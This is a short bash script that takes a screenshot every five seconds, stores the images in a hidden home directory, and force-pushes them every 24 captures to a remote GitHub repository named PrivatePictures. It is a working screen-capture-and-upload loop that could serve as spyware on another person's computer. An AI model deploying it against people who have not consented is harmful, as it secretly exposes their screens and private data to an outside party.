counter=0
while [ 0 -eq 0 ]
do
  echo "Taking a picture: $counter"
  date=`date`
  date=${date// /_}
  path=~/.atakepic_client
  if [ ! -d "$path" ]
  then 
    mkdir -p $path
    cd $path
    git init
    git remote add origin git@github.com:dongnguyen1999/PrivatePictures.git
    git pull
    git checkout -b client
  fi
  scrot "$path/$date.png"
  echo "Saved a picture as $date.png"
  sleep 5
  counter=`expr $counter + 1`
  if [ `expr $counter % 24` -eq 0 ]
  then
    cd $path
    git add .
    git commit -m 'update new pictures'
    git push -u --force origin client
  fi
done